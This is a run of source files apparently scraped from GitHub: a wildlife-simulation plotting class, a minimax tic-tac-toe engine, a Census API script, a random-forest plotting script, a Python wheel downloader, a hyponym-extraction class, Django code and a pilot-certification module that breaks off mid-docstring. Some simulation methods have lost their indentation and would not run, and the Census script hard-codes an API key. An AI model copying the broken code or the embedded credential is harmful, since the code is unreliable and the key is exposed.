        if self._carn_line is None:
            carn_plot = self._mean_ax.plot(
                np.arange(0, self._final_year),
                np.full(self._final_year, np.nan),
            )
            self._carn_line = carn_plot[0]
        else:
            xdata, ydata = self._carn_line.get_data()
            xnew = np.arange(xdata[-1] + 1, self._final_year)
            if len(xnew) > 0:
                ynew = np.full(xnew.shape, np.nan)
                self._carn_line.set_data(
                    np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
                )
    def _update_herb_heatmap(self, herb_heat):
        """
        Updates the heatmap for Herbivores.

        :param herb_heat: 2D array of herbivore counts per island cell

        On the first call the image, its horizontal colorbar and the tick
        labels are created; afterwards only the image data is swapped.
        """
        if self.herb_img_axis is not None:
            self.herb_img_axis.set_data(herb_heat)
        else:
            self.herb_img_axis = self.herb_heat.imshow(
                herb_heat,
                interpolation="nearest",
                vmin=0,
                vmax=self.cmax_animals["Herbivore"],
            )
            # Manually-placed colorbar under the heatmap, labelled Low/High
            # instead of numeric ticks.
            cax = self._fig.add_axes([0.05, 0.5, 0.4, 0.02])
            cbar = self._fig.colorbar(
                self.herb_img_axis, cax=cax, orientation="horizontal"
            )
            cbar.set_ticks([])
            cbar.ax.text(0.5, 0, "Low", va="bottom", ha="left", color="white")
            cbar.ax.text(50, 0, "High", va="bottom", ha="right")
            self.herb_heat.set_xticks(range(len(self.map_rgb[0])))
            self.herb_heat.set_xticklabels(
                labels=(range(1, 1 + len(self.map_rgb[0]))),
                fontdict={"fontsize": 6},
            )
            self.herb_heat.set_yticks(range(len(self.map_rgb)))
            self.herb_heat.set_yticklabels(
                labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
            )
    def _update_carn_heatmap(self, carn_heat):
        """
        Updates the heatmap for Carnivores.

        :param carn_heat: 2D array of carnivore counts per island cell

        Image and tick labels are created on the first call only; later
        calls just replace the image data.
        """
        if self.carn_img_axis is not None:
            self.carn_img_axis.set_data(carn_heat)
        else:
            self.carn_img_axis = self.carn_heat.imshow(
                carn_heat,
                interpolation="nearest",
                vmin=0,
                vmax=self.cmax_animals["Carnivore"],
            )
            self.carn_heat.set_xticks(range(len(self.map_rgb[0])))
            self.carn_heat.set_xticklabels(
                labels=(range(1, 1 + len(self.map_rgb[0]))),
                fontdict={"fontsize": 6},
            )
            self.carn_heat.set_yticks(range(len(self.map_rgb)))
            self.carn_heat.set_yticklabels(
                labels=(range(1, 1 + len(self.map_rgb))), fontdict={"fontsize": 6}
            )
def _update_specie_lines(self):
"""
Updates the population lines for Herbivore and Carnivore
"""
herb_amount = self.num_animals_per_species["Herbivore"]
ydata_herb = self._herb_line.get_ydata()
ydata_herb[self._year] = herb_amount
self._herb_line.set_ydata(ydata_herb)
carn_amount = self.num_animals_per_species["Carnivore"]
ydata_carn = self._carn_line.get_ydata()
ydata_carn[self._year] = carn_amount
self._carn_line.set_ydata(ydata_carn)
self._mean_ax.legend(["Herbivore", "Carnivore"], prop={"size": 6})
    def add_population(self, population):
        """
        Add a population to the island.

        :param population: List of dictionaries specifying population
        """
        # Placement and validation are delegated to the island map.
        self._map.add_animals(population)
    @property
    def year(self):
        """Last year simulated."""
        # Backing field is advanced once per cycle in simulate().
        return self._year
@property
def num_animals(self):
"""Total number of animals on island."""
self._num_animals = sum(self._map.num_species_on_map())
print(self._num_animals)
return self._num_animals
@property
def num_animals_per_species(self):
"""Number of animals per species in island, as dictionary."""
tot_herbivore, tot_carnivore = self._map.num_species_on_map()
self._num_animals_per_species["Herbivore"] = tot_herbivore
self._num_animals_per_species["Carnivore"] = tot_carnivore
return self._num_animals_per_species
@property
def animal_distribution(self):
"""Pandas DataFrame with animal count per species for each cell on
island. """
list_of_dicts = []
y_lim, x_lim = np.shape(self._map.map)
for y in range(y_lim):
for x in range(x_lim):
curr_cell = self._map.map[(y, x)]
(
curr_herbivores,
curr_carnivores,
) = curr_cell.num_species_per_cell()
curr_dict = {
"Row": y,
"Col": x,
"Herbivore": curr_herbivores,
"Carnivore": curr_carnivores,
}
list_of_dicts.append(curr_dict)
df = pd.DataFrame(
list_of_dicts, columns=["Row", "Col", "Herbivore", "Carnivore"]
)
return df
    def make_movie(self, movie_fmt=_DEFAULT_MOVIE_FORMAT):
        """Create MPEG4 movie from visualization images saved.

        :param movie_fmt: 'mp4' (encoded with ffmpeg) or 'gif'
            (assembled with ImageMagick convert)
        :raise RuntimeError: if no image base name is set or the external
            encoder exits with an error
        :raise ValueError: if movie_fmt is not a supported format
        """
        if self.img_base is None:
            raise RuntimeError("No filename defined.")
        if movie_fmt == "mp4":
            try:
                # Parameters chosen according to
                # http://trac.ffmpeg.org/wiki/Encode/H.264, section
                # "Compatibility"
                subprocess.check_call(
                    [
                        _FFMPEG_BINARY,
                        "-i",
                        "{}_%05d.png".format(self.img_base),
                        "-y",
                        "-profile:v",
                        "baseline",
                        "-level",
                        "3.0",
                        "-pix_fmt",
                        "yuv420p",
                        "{}.{}".format(self.img_base, movie_fmt),
                    ]
                )
            except subprocess.CalledProcessError as err:
                raise RuntimeError("ERROR: ffmpeg failed with: {}".format(err))
        elif movie_fmt == "gif":
            try:
                # ImageMagick expands the *.png wildcard itself.
                subprocess.check_call(
                    [
                        _CONVERT_BINARY,
                        "-delay",
                        "1",
                        "-loop",
                        "0",
                        "{}_*.png".format(self.img_base),
                        "{}.{}".format(self.img_base, movie_fmt),
                    ]
                )
            except subprocess.CalledProcessError as err:
                raise RuntimeError(
                    "ERROR: convert failed with: {}".format(err)
                )
        else:
            raise ValueError("Unknown movie format: " + movie_fmt)
| amirarfan/BioSim_G03_Amir_Sebastian | src/biosim/simulation.py | simulation.py | py | 15,901 | python | en | code | 0 | github-code | 36 |
38758362841 | #!/usr/bin/env python
"""
engine utilises a function policy to choose the best move using minimax
"""
from noughts_crosses import *
from node import *
class Engine:
    """
    Chooses the best move for a noughts-and-crosses position by running
    depth-limited minimax over a policy function.
    """

    def __init__(self, policy, searchDepth, discount):
        # policy : fn board -> [-1.0, 1.0]
        # searchDepth : int, maximum number of plies to search
        # discount : float, factor applied to scores at every ply so that
        #            nearer outcomes outweigh distant ones
        self.policy = policy
        self.searchDepth = searchDepth
        self.discount = discount

    def create_search_tree(self, board, player):
        'create search tree from board'
        node = Node(board)
        if player == players[0]:
            self.maximise(node, self.searchDepth, True)
        else:
            self.minimise(node, self.searchDepth, True)
        return node

    def minimax(self, board, player):
        'find the best move using minimax and return the principal variation board'
        return self.create_search_tree(board, player).pv.board

    def maximise(self, node, depth, rootNode):
        'maximise policy score for players[0]'
        # rootNode is unused but retained for backward compatibility.
        return self._search(node, depth, players[0], 1.0, self.minimise)

    def minimise(self, node, depth, rootNode):
        'minimise policy score for players[1]'
        # rootNode is unused but retained for backward compatibility.
        return self._search(node, depth, players[1], -1.0, self.maximise)

    def _search(self, node, depth, player, sign, recurse):
        """
        Shared body of maximise/minimise (they were near-duplicates).

        :param sign: +1.0 when maximising, -1.0 when minimising
        :param recurse: the opposite-player search method applied to each
            daughter node
        :return: discounted best policy score reachable from node

        Side effect: node.pv is set to the best daughter and all other
        daughters are appended to node.other.
        """
        if (depth == 0) or (node.reward is not None):
            return self.policy(node.board)
        best = -2.0 * sign  # worse than any reachable policy score
        for move in move_all(player, node.board):
            daughter = Node(move)
            score = recurse(daughter, depth - 1, False)
            # sign * x > sign * y is "x better than y" for this player.
            if sign * score > sign * best:
                # New best move: demote the previous principal variation.
                if node.pv is not None:
                    node.other.append(node.pv)
                best = score
                node.pv = daughter
            else:
                node.other.append(daughter)
        return self.discount * best
if __name__ == "__main__":
    # Smoke test: full-depth search from the empty board for the first player.
    e = Engine(optimal, 9, 0.7)
    tree = e.create_search_tree(initialBoard, players[0])
    # Nine opening moves: one becomes the PV, the other eight land in `other`.
    assert(len(tree.other) == 8)
    pretty_print(tree.pv.board)
| dyth/Juno | engine.py | engine.py | py | 2,412 | python | en | code | 0 | github-code | 36 |
40117095233 | """
pop_by_tract.py (Script 1/3)
Date updated: 5/11/2023
Imports DC population data by census tract from Census API.
"""
"""
Requires:
- Census API key, which can be acquired here: https://api.census.gov/data/key_signup.html
Output:
- "pop_by_tract_2020.csv"
"""
#%%
## Set working directory to script directory "2020_Analysis" so relative
## paths below resolve correctly.
## Note: Be sure that the required input files are located in the
## "2020_Analysis" folder as well.
import os
os.chdir(os.path.dirname(__file__))
#%%
# Import modules
import requests
import pandas as pd
import numpy as np
#%%
## API call

# Census variable code -> human-readable column name
variables = {'B02001_001E':'pop_total', 'B02001_002E':'pop_white',
             'B25003_001E':'housing_total', 'B25003_002E':'housing_owned',
             'B25003_003E':'housing_rental'}

# Variable list
var_list = variables.keys()

# Variable string (comma-separated)
var_string = ",".join(var_list)

# URL for the 2020 ACS 5-year estimates endpoint
api = 'https://api.census.gov/data/2020/acs/acs5'

# Set geographic unit
for_clause = 'tract:*'

# Select Washington, DC (state FIPS 11, county FIPS 001)
in_clause = 'state:11 county:001'

# SECURITY: prefer the CENSUS_API_KEY environment variable. The hard-coded
# fallback keeps the script runnable as before, but the key should be
# rotated and removed from source control.
key_value = os.environ.get('CENSUS_API_KEY',
                           'f382fd0108eba2b32808ba82bcccc82861d0b53a')

# API call
payload = {'get':var_string, 'for':for_clause, 'in':in_clause, 'key':key_value}
response = requests.get(api, payload)
if response.status_code == 200:
    print('\nAPI Request: Success\n')
else:
    print(f'\nRequest status code: {response.status_code}\n{response.text}\n')
    assert False
#%%
## Convert JSON to Dataframe
# The Census API returns a JSON array whose first row is the header.
row_list = response.json()
# Set column names
colnames = row_list[0]
# Set data rows
datarows = row_list[1:]
# Pandas dataframe
pop = pd.DataFrame(columns=colnames, data=datarows)
#%%
## Prepare data
# Replace the Census sentinel for missing data with NaN
pop = pop.replace(-666666666, np.nan)
# Rename columns from Census variable codes to readable names
pop = pop.rename(columns=variables)
# GEOID column: state FIPS + county FIPS + tract code
pop['GEOID'] = pop['state'] + pop['county'] + pop['tract']
# Set index to GEOID
pop = pop.set_index('GEOID')
# Drop columns, keeping only the renamed variables of interest
keep_cols = variables.values()
pop = pop[keep_cols]
#%%
## Write population by census tract to CSV
pop.to_csv('pop_by_tract_2020.csv')
print("\nDownloaded 'pop_by_tract_2020.csv'")
| tbond99/dc-historic-districts-and-gentrification | 1__2020_Analysis/1_pop_by_tract.py | 1_pop_by_tract.py | py | 2,153 | python | en | code | 0 | github-code | 36 |
18395372288 | """
Produce the feature importance matrices for the trained RF models as in Figures 4-6 of Appleby+2023.
"""
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import pickle
import sys
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn import preprocessing
from sklearn.metrics import r2_score, explained_variance_score, mean_squared_log_error, mean_squared_error
from scipy.stats import pearsonr
# Fix the NumPy RNG so forest training is reproducible between runs.
np.random.seed(1)
# Use LaTeX-rendered serif text in all figures.
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=16)
if __name__ == '__main__':

    # Command-line arguments: simulation model, wind model, snapshot, ion line.
    model = sys.argv[1]
    wind = sys.argv[2]
    snap = sys.argv[3]
    line = sys.argv[4]

    features = ['N', 'b', 'EW', 'dv', 'r_perp', 'mass', 'ssfr', 'kappa_rot']
    predictors = ['delta_rho', 'T', 'Z']
    features_pretty = [r'${\rm log} N$', r'$b$', r'${\rm log\ EW}$',
                       r'${\rm d}v$', r'$f_{r200}$', r'${\rm log} M_\star$',
                       r'${\rm sSFR}$', r'$\kappa_{\rm rot}$']
    predictors_pretty = [r'${\rm log}\ \delta$', r'${\rm log}\ T$', r'${\rm log}\ Z$']

    lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
    lines_short = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
    # Solar abundance normalisation for each ion's parent element.
    zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]

    model_dir = './models/'

    cmap = sns.color_palette("flare_r", as_cmap=True)
    fig, ax = plt.subplots(1, 3, figsize=(18, 9))
    fig.subplots_adjust(right=0.8)
    cbar_ax = fig.add_axes([0.82, 0.295, 0.02, 0.4])
    # importance[p][i][j]: importance of feature j when feature i is removed,
    # for predictor p. The removed feature's own slot stays zero (masked).
    importance = np.zeros((3, len(features), len(features)))

    score_columns = ['Feature removed', 'Pearson', 'r2_score',
                     'explained_variance_score', 'mean_squared_error']

    for p, pred in enumerate(predictors):

        # Load in the random forest gridsearch and the absorber data
        gridsearch, _, _, _, _ = \
            pickle.load(open(f'{model_dir}{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_{pred}.model', 'rb'))
        df_full = pd.read_csv(f'data/{model}_{wind}_{snap}_{line}_lines.csv')
        train = df_full['train_mask']

        # Collect one score dict per removed feature; building the DataFrame
        # once at the end replaces the DataFrame.append() API (removed in
        # pandas 2.0) and avoids quadratic re-copying.
        score_rows = []

        for i in range(len(features)):

            # Iteratively choose all features but one
            features_use = np.delete(features, i)
            idx = np.delete(np.arange(len(features)), i)

            # Scale the features and predictors to mean 0 and sigma 1
            feature_scaler = preprocessing.StandardScaler().fit(df_full[train][features_use])
            predictor_scaler = preprocessing.StandardScaler().fit(np.array(df_full[train][pred]).reshape(-1, 1) )

            # Train a random forest model using the best parameters from the
            # full grid search and all but one of the features
            random_forest = RandomForestRegressor(n_estimators=gridsearch.best_params_['n_estimators'],
                                                  min_samples_split=gridsearch.best_params_['min_samples_split'],
                                                  min_samples_leaf=gridsearch.best_params_['min_samples_leaf'],)
            random_forest.fit(feature_scaler.transform(df_full[train][features_use]), predictor_scaler.transform(np.array(df_full[train][pred]).reshape(-1, 1) ))

            # Get the feature importances
            importance[p][i][idx] = random_forest.feature_importances_

            # Evaluate the performance of the model on the held-out set
            conditions_pred = predictor_scaler.inverse_transform(np.array( random_forest.predict(feature_scaler.transform(df_full[~train][features_use]))).reshape(-1, 1) )
            conditions_true = pd.DataFrame(df_full[~train],columns=[pred]).values
            conditions_pred = conditions_pred.flatten()
            conditions_true = conditions_true.flatten()

            # Express metallicities relative to the solar abundance.
            if pred == 'Z':
                conditions_pred -= np.log10(zsolar[lines.index(line)])
                conditions_true -= np.log10(zsolar[lines.index(line)])

            scores = {}
            scores['Feature removed'] = features[i]
            scores['Pearson'] = round(pearsonr(conditions_true, conditions_pred)[0],3)
            for _scorer in [r2_score, explained_variance_score, mean_squared_error]:
                # sklearn metrics take (y_true, y_pred); the original call
                # passed them swapped, which biases r2/explained variance.
                scores[_scorer.__name__] = float(_scorer(conditions_true,
                                                         conditions_pred, multioutput='raw_values'))
            score_rows.append(scores)

        err = pd.DataFrame(score_rows, columns=score_columns)
        print(pred, err)

        # Plot importance matrix
        importance_use = np.transpose(importance[p])
        mask = importance_use == 0
        if p == len(predictors) - 1:
            # Last panel carries the shared colorbar.
            g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
                            cbar_ax=cbar_ax, cbar_kws={'label': 'Importance'})
        else:
            g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
                            cbar=False)
        g.figure.axes[p].set_xticklabels(features_pretty, rotation='vertical', fontsize=15)
        g.figure.axes[p].set_xlabel('Removed feature')
        if p == 0:
            g.figure.axes[p].set_ylabel('Remaining features')
            g.figure.axes[p].set_yticklabels(features_pretty, rotation='horizontal', fontsize=15)
        else:
            g.figure.axes[p].set_yticklabels(['']*len(features), rotation='horizontal', fontsize=15)
        g.figure.axes[p].set_title(predictors_pretty[p])
        g.figure.axes[p].tick_params(left=False, bottom=False)

    fig.subplots_adjust(wspace=0.1)
    plt.savefig(f'plots/{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_importance.png')
    plt.close()
| sarahappleby/cgm_ml | plot_feature_importance.py | plot_feature_importance.py | py | 5,793 | python | en | code | 0 | github-code | 36 |
26259789038 | # Problem : Inverse Geodesic using GeographicLib
from geographiclib.geodesic import Geodesic
geod = Geodesic.WGS84 # use the WGS84 reference ellipsoid model
def Geodesic_Inverse( lat1, lng1, lat2, lng2 ): # solve the inverse geodesic problem
    """
    Solve the inverse geodesic problem between two points on the WGS84
    ellipsoid.

    :param lat1: latitude of the start point (degrees)
    :param lng1: longitude of the start point (degrees)
    :param lat2: latitude of the end point (degrees)
    :param lng2: longitude of the end point (degrees)
    :return: (forward azimuth at point 1, forward azimuth at point 2,
        geodesic distance in metres)
    """
    result = geod.Inverse(lat1, lng1, lat2, lng2)
    # keep only the two forward azimuths and the distance from the solution
    fwd_Az1, fwd_Az2, s12 = result['azi1'], result['azi2'], result['s12']
    return fwd_Az1, fwd_Az2, s12
# Example: Amsterdam Schiphol to Bahrain; unpack azimuths and distance.
fwd_Az1, fwd_Az2, s12 = Geodesic_Inverse( 52.30861, 4.76389, 26.27083, 50.6336 )
print(' fwd_Az1 | fwd_Az2 | Distance')
print( ' {:.5f} {:.5f} {:.3f} m. '.format(fwd_Az1, fwd_Az2, s12))
| isara-c/Geodesy-SurveyEng | GeodesicAirliner.py | GeodesicAirliner.py | py | 1,163 | python | th | code | 0 | github-code | 36 |
32527451220 | import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
def get_web_source():
    """Return the HTML page source cached in pylib_data.html."""
    with open('pylib_data.html', 'r') as source_file:
        return source_file.read()
def get_url_list(web_source):
    """
    Extract every .whl download URL from the saved pythonlibs page source.

    Matching URLs are printed, appended to E:\\Desktop\\url.txt and returned.

    :param web_source: HTML source of the download page
    :return: list of wheel download URLs
    """
    base_url = 'https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/'
    soup = BeautifulSoup(web_source,'lxml')
    names = soup.select('.pylibs li ul li a')
    url_list = []
    # Open the log file once instead of re-opening it for every URL.
    # The stray debug prints of names[0] (which crashed on an empty page)
    # and the dead encoding experiments were removed.
    with open('E:\\Desktop\\url.txt','a',encoding='utf-8') as f:
        for name in names:
            url = base_url+name.text
            if '.whl' in url:
                print(url)
                url_list.append(url)
                f.write(url+'\n')
    return url_list
def download_whl(url):
    """
    Download a single wheel file into E:\\Desktop\\python_whl\\.

    :param url: direct download URL of a .whl file
    """
    try:
        source = requests.get(url)
    except requests.RequestException:
        print('请求资源错误!')
        # Bail out: without a response there is nothing to save. (The
        # original fell through and crashed on an undefined `source`.)
        return
    file_name = url.split('/')[-1]
    print('正在下载:'+file_name)
    with open('E:\\Desktop\\python_whl\\'+file_name,'wb') as f:
        f.write(source.content)
def main():
    """Collect wheel URLs from the cached page and download them in parallel."""
    pool = Pool(20)  # 20 worker processes
    web_source = get_web_source()
    url_list = get_url_list(web_source)
    #print(url_list)
    # map() blocks until every download has finished.
    pool.map(download_whl,url_list)
    pool.close()

if __name__ == '__main__':
    main()
| MrDannyWu/DannyPythonStudy | py_script/get_python_libs.py | get_python_libs.py | py | 1,785 | python | en | code | 0 | github-code | 36 |
7706920914 | from interventions_labeling_lib.hearst_pattern_finder import HearstPatterns
from text_processing import text_normalizer
import pickle
from time import time
from text_processing import concepts_merger
import os
class HyponymsSearch:
    """
    Accumulates hyponym relations detected per article, merges
    near-duplicate concept strings, and builds a hypernym -> hyponym
    dictionary with supporting evidence.
    """

    def __init__(self):
        # Prefix length used by the concepts merger when comparing concepts.
        self.symbols_count = 5
        # hypernym -> {hyponym -> [(pattern sentence, article id, extra)]}
        self.dict_hyponyms = {}
        # article id -> list of raw detected hyponym tuples
        self.global_hyponyms = {}
        self.concepts_merger = concepts_merger.ConceptsMerger(self.symbols_count)

    def add_hyponyms(self, hyponyms, article_number):
        """
        Record detected hyponym tuples for one article and register the
        first two words of each tuple with the concepts merger.
        """
        if article_number not in self.global_hyponyms:
            self.global_hyponyms[article_number] = []
        self.global_hyponyms[article_number].extend(hyponyms)
        for detected_hyponym in hyponyms:
            for word in detected_hyponym[:2]:
                if word.strip() != "":
                    self.concepts_merger.add_item_to_dict(word,article_number)

    def add_hyponyms_to_dict(self):
        """
        Rebuild dict_hyponyms from the accumulated tuples, mapping both
        concept words through the merger's canonical-name mapping, then
        reset the merger for a subsequent run.
        """
        self.dict_hyponyms = {}
        for article_number in self.global_hyponyms:
            for detected_hyponym in self.global_hyponyms[article_number]:
                # Only keep pairs where both concepts survived the merge.
                if detected_hyponym[1] in self.concepts_merger.new_mapping and detected_hyponym[0] in self.concepts_merger.new_mapping:
                    first_word = self.concepts_merger.new_mapping[detected_hyponym[1]]
                    second_word = self.concepts_merger.new_mapping[detected_hyponym[0]]
                    if first_word not in self.dict_hyponyms:
                        self.dict_hyponyms[first_word] = {}
                    if second_word not in self.dict_hyponyms[first_word]:
                        self.dict_hyponyms[first_word][second_word] = []
                    # Strip the NP_ chunk markers from the evidence phrase.
                    self.dict_hyponyms[first_word][second_word].append((detected_hyponym[2].replace("NP_","").replace("_"," "), article_number, detected_hyponym[3]))
        self.concepts_merger = concepts_merger.ConceptsMerger(self.symbols_count)

    def create_hyponym_dict(self, search_engine_inverted_index, threshold = 0.92):
        """Merge similar concepts (similarity >= threshold) and build the dict."""
        self.concepts_merger.merge_concepts(search_engine_inverted_index, threshold)
        self.add_hyponyms_to_dict()

    def find_hyponyms_and_hypernyms(self, articles_df, search_engine_inverted_index, filename_with_data="", columns_to_use=["title", "abstract"]):
        """
        Run Hearst-pattern extraction over the article texts, optionally
        seeding from previously pickled results, then build the dictionary.
        (The mutable default for columns_to_use is only read, never mutated.)
        """
        if filename_with_data != "" and os.path.exists(filename_with_data):
            # Re-use hyponyms already extracted in an earlier run.
            hyp_s = pickle.load(open(filename_with_data,"rb"))
            for article in hyp_s.global_hyponyms:
                self.add_hyponyms(hyp_s.global_hyponyms[article], article)
        h = HearstPatterns(True)
        for i in range(len(articles_df)):
            art_id = articles_df["id"].values[i] if "id" in articles_df.columns else i
            if art_id in self.global_hyponyms:
                continue
            if i % 5000 == 0 or i == len(articles_df) - 1:
                print("Processed %d articles" % i)
            # Concatenate the selected text columns into one document.
            text = ""
            for column in columns_to_use:
                text = text + " . " + articles_df[column].values[i]
            self.add_hyponyms(h.find_hyponyms(text), art_id)
        self.create_hyponym_dict(search_engine_inverted_index)
31266470749 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
    """Initial schema for the product app: Product, Comment and Like models."""

    # Comment and Like reference the (possibly swapped) user model.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    # NOTE(review): ForeignKey without on_delete implies Django < 2.0.
    operations = [
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('text', models.TextField(blank=True)),
                ('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
            ],
        ),
        migrations.CreateModel(
            name='Like',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
            ],
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=200)),
                ('slug', models.CharField(max_length=220, blank=True)),
                ('description', models.TextField(blank=True)),
                ('price', models.DecimalField(max_digits=16, decimal_places=2)),
                ('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
                ('modified_at', models.DateTimeField(default=django.utils.timezone.now)),
            ],
        ),
        # Foreign keys are added after all models exist to avoid ordering issues.
        migrations.AddField(
            model_name='like',
            name='product',
            field=models.ForeignKey(default=None, to='product.Product'),
        ),
        migrations.AddField(
            model_name='like',
            name='user',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='comment',
            name='product',
            field=models.ForeignKey(to='product.Product'),
        ),
        migrations.AddField(
            model_name='comment',
            name='user',
            field=models.ForeignKey(default=None, blank=True, to=settings.AUTH_USER_MODEL),
        ),
        # A user may like a given product at most once.
        migrations.AlterUniqueTogether(
            name='like',
            unique_together=set([('product', 'user')]),
        ),
    ]
| unkvuzutop/product | product/migrations/0001_initial.py | 0001_initial.py | py | 2,443 | python | en | code | 0 | github-code | 36 |
14566383158 | from django.core.management.base import BaseCommand
from depot.models import SiteBookPublish
class Command(BaseCommand):
    """Publish every pending (status=0) SiteBookPublish, oldest first."""

    def handle(self, **options):
        pending = SiteBookPublish.objects.filter(status=0).order_by('created_at')
        for publication in pending:
            print(publication.id, publication.site_book, publication.created_at)
            publication.publish()
| fnp/redakcja | src/depot/management/commands/depot.py | depot.py | py | 314 | python | en | code | 4 | github-code | 36 |
26319259400 | """
Module determining pilot certifications, ratings, and endorsements.
The restrictions that we place on a pilot depend on their qualifications. There are three
ways to think about a pilot.
(1) Certifications. These are what licenses a pilot has. We also use these to classify
where the student is in the licensing process. Is the student post solo (can fly without
instructor), but before license? Is the student 50 hours past their license (a threshold
that helps with insurance)?
(2) Ratings. These are extra add-ons that a pilot can add to a license. For this project,
the only rating is Instrument Rating, which allows a pilot to fly through adverse weather
using only instruments.
(3) Endorsements. These are permission to fly certain types of planes solo. Advanced
allows a pilot to fly a plane with retractable landing gear. Multiengine allows a pilot
to fly a plane with more than one engine.
The file pilots.csv is a list of all pilots in the school, together with the dates that
they earned these certifications, ratings, and endorsements. Specifically, this CSV file
has the following header:
ID LASTNAME FIRSTNAME JOINED SOLO LICENSE 50 HOURS INSTRUMENT ADVANCED MULTIENGINE
The first three columns are strings, while all other columns are dates.
The functions in this class take a row from the pilot table and determine if a pilot has
a certain qualification at the time of takeoff. As this program is auditing the school
over a course of a year, a student may not be instrument rated for one flight but might
be for another.
The preconditions for many of these functions are quite messy. While this makes writing
the functions simpler (because the preconditions ensure we have less to worry about),
enforcing these preconditions can be quite hard. That is why it is not necessary to
enforce any of the preconditions in this module.
Author: Christopher Jordan
Date: September 18, 2021
"""
import utils
# CERTIFICATION CLASSIFICATIONS
# The certification of this pilot is unknown
PILOT_INVALID = -1
# A pilot that has joined the school, but has not soloed
PILOT_NOVICE = 0
# A pilot that has soloed but does not have a license
PILOT_STUDENT = 1
# A pilot that has a license, but has under 50 hours post license
PILOT_CERTIFIED = 2
# A pilot that 50 hours post license
PILOT_50_HOURS = 3


def get_certification(takeoff, student):
    """
    Returns the certification classification for this student at the time of takeoff.

    The certification is represented by an int, and must be the value PILOT_NOVICE,
    PILOT_STUDENT, PILOT_CERTIFIED, PILOT_50_HOURS, or PILOT_INVALID. It is
    PILOT_50_HOURS if the student certified '50 Hours' before this takeoff,
    PILOT_CERTIFIED if the student earned a private license before this takeoff,
    and PILOT_STUDENT if the student soloed before this takeoff. A pilot that
    has only just joined the school is PILOT_NOVICE. If the flight takes place
    before the student has even joined the school, the result is PILOT_INVALID.

    Recall that a student is a 10-element list of strings. The first three
    elements are the student's identifier, last name, and first name. The
    remaining elements are all timestamps indicating the following in order:
    time joining the school, time of first solo, time of private license,
    time of 50 hours certification, time of instrument rating, time of
    advanced endorsement, and time of multiengine endorsement. A missing
    milestone is the empty string.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    # Parse the four certification milestones (joined, solo, license,
    # 50 hours), normalising each to takeoff's timezone so all comparisons
    # below are between like datetimes. Empty strings become None.
    milestones = []
    for stamp in student[3:7]:
        if stamp == '':
            milestones.append(None)
        else:
            milestones.append(utils.str_to_time(stamp).replace(tzinfo=takeoff.tzinfo))
    joined, solo, license_time, fifty_hours = milestones

    # An unknown join date, or a takeoff before joining, cannot be classified.
    if joined is None or takeoff < joined:
        return PILOT_INVALID

    # Check milestones from most to least advanced; missing milestones are
    # simply skipped. (Unlike the original nested chains, a takeoff exactly
    # at the join time now counts as PILOT_NOVICE instead of implicitly
    # returning None, and an empty intermediate milestone no longer crashes.)
    if fifty_hours is not None and takeoff > fifty_hours:
        return PILOT_50_HOURS
    if license_time is not None and takeoff > license_time:
        return PILOT_CERTIFIED
    if solo is not None and takeoff > solo:
        return PILOT_STUDENT
    return PILOT_NOVICE
def has_instrument_rating(takeoff,student):
    """
    Return True if the student held an instrument rating at takeoff, False otherwise.

    The rating timestamp is element 7 of the pilot record; an empty string
    means the rating was never earned. A pilot with an instrument rating may
    still choose to fly a given flight under VFR rules.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    rating = student[7]
    return rating != '' and takeoff > utils.str_to_time(rating)
def has_advanced_endorsement(takeoff,student):
    """
    Return True if the student was endorsed for advanced planes at takeoff,
    False otherwise.

    The endorsement timestamp is element 8 of the pilot record; an empty
    string means the endorsement was never earned.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is 10-element list of strings representing a pilot
    """
    endorsed = student[8]
    return endorsed != '' and takeoff > utils.str_to_time(endorsed)
def has_multiengine_endorsement(takeoff, student):
    """Return True if the student was endorsed for multiengine planes at takeoff.

    Recall that a student is a 10-element list of strings: identifier, last
    name, first name, followed by timestamps for joining the school, first
    solo, private license, 50-hours certification, instrument rating,
    advanced endorsement, and multiengine endorsement.

    Parameter takeoff: The takeoff time of this flight
    Precondition: takeoff is a datetime object

    Parameter student: The student pilot
    Precondition: student is a 10-element list of strings representing a pilot
    """
    endorsement_stamp = student[9]
    if not endorsement_stamp:
        # Empty string means the endorsement was never earned.
        return False
    return takeoff > utils.str_to_time(endorsement_stamp)
def get_minimums(cert, area, instructed, vfr, daytime, minimums):
    """Return the most advantageous minimums for the given flight category.

    `minimums` is a 2d list (table) including a header row with columns
